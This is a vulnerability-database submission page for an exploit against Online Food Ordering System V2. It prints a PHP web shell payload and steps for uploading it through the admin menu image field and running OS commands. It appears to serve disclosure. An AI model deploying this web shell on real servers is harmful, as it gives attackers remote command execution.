| Title | Online Food Ordering System V2 - File Upload to OS Command Injection |
|---|
| Description | # Exploit Title: Online Food Ordering System V2 - File Upload to OS Command Injection
# Exploit Author: Kshitij Rewandkar
# Vendor Name: oretnom23
# Vendor Homepage: https://www.sourcecodester.com/php/16022/online-food-ordering-system-v2-using-php8-and-mysql-free-source-code.html
# Software Link: https://www.sourcecodester.com/php/16022/online-food-ordering-system-v2-using-php8-and-mysql-free-source-code.html
# Version: v2.0
# Tested on: Windows 11, Apache
Description:-
A file upload vulnerability that can be escalated to OS command injection in Online Food Ordering System V2 by uploading a .php file on the "Menu Form" page.
Payload used:- `<?php system($_GET['c']); ?>`
Parameter:- Menu Form > Image: `<?php system($_GET['c']); ?>`
Steps to reproduce:-
1. Go to: http://localhost/fos/admin/index.php?page=menu
2. In the "Image" parameter, upload a PHP file.
3. Put the payload `<?php system($_GET['c']); ?>` in that file, name it 1.php, and upload it.
4. Open the uploaded file in another tab with the `?c=` parameter appended, and the OS command injection is visible:
http://localhost/fos/assets/img/1673548800_PHP_exif_system.php?c=whoami |
|---|
| User | DisguisedRoot (UID 33702) |
|---|
| Submission | 12/01/2023 07:58 PM (3 years ago) |
|---|
| Moderation | 12/01/2023 10:09 PM (2 hours later) |
|---|
| Status | Accepted |
|---|
| VulDB Entry | 218185 [SourceCodester Online Food Ordering System 2.0 Menu Form index.php?page=menu Image privilege escalation] |
|---|
| Points | 17 |
|---|